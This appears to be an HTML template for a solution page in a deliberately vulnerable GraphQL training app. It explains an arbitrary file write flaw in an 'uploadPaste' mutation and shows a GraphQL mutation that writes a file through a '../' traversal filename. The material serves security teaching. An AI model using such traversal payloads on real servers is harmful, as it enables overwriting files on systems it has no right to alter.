{% extends 'partials/solutions/solution_base.html' %}
<!-- Start -->
{% block title %}Miscellaneous :: Arbitrary File Write // Path Traversal{% endblock %}

{% block body %}
  <p>
    The mutation <code>uploadPaste</code> allows uploading pastes from the user's computer by specifying the file along
    with the filename. The pastes are then stored on the server under a dedicated folder. The <code>filename</code>
    argument allows any string, effectively providing the ability to write the file to any location on the server's
    filesystem by traversing folders using <code>../../</code>
  </p>
{% endblock %}

{% block resources %}
  <li>
    <a href="https://owasp.org/www-community/attacks/Path_Traversal" target="_blank">
      <i class="fa fa-newspaper"></i> OWASP - Path Traversal
    </a>
  </li>
{% endblock %}

{% block exploits %}
  <pre class="bash">
    # Traverse the filesystem and place the file where you desire.
    mutation {
      uploadPaste(filename:"../../../../../tmp/file.txt", content:"hi"){
        result
      }
    }
  </pre>
{% endblock %}
<!-- End -->
